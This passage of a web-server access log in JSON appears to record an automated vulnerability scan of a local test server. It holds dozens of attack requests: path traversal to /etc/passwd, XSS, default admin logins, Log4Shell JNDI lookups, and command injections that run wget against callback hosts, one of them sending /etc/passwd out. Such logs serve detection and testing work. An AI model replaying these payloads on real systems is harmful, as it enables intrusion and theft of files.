"http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229N5mA8lORCYbTr7NpRvz7k6PHw.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29N5mA8lORCYbTr7NpRvz7k6PHw&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.ca2u0eosmpv1jhs80ca0qqnj3wsxzgqt3.oast.fun}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=XhLE@iysj&url=http://ca2u0eosmpv1jhs80ca0rt1tiwmphkrs9.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://ca2u0eosmpv1jhs80ca0gcbyz4hdk5adp.oast.fun)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://ca2u0eosmpv1jhs80ca089wfxewi7gc7u.oast.fun%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca2u0eosmpv1jhs80ca05mqbc91q3q8nn.oast.fun%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"j_username=${jndi:ldap://${hostName}.ca2u0eosmpv1jhs80ca044o9dex3brumk.oast.fun}&j_password=password&logincontext=employee","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.092","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/mifs/user/login.jsp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://ca2u0eosmpv1jhs80ca04z8iofcxg4k13.oast.fun)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca2u0eosmpv1jhs80ca0xa94kx49674pu.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.shiro.jndi.JndiObjectFactory\x22,\x0D\x0A \x22resourceName\x22:\x22rmi://ca2u0eosmpv1jhs80ca0hef9zmqirssrr.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.116","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://ca2u0eosmpv1jhs80ca0riq48arsu988u.oast.fun&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://ca2u0eosmpv1jhs80ca04imuteh344557.oast.fun') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20ca2u0eosmpv1jhs80ca0qor8a54khssto.oast.fun) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.101","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"ca2u0eosmpv1jhs80ca0q53k6e7ichfdj.oast.fun","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.149","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"key=';`wget http://ca2u0eosmpv1jhs80ca0j4869map943oc.oast.fun`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.086","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"aps=ca2u0eosmpv1jhs80ca0zd3spxqjgnusq.oast.fun&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.136","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"dJO88rqv","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /functionRouter HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.161","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://ca2u0eosmpv1jhs80ca07ru1xf9s7m39a.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boafrm/formSysCmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.162","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 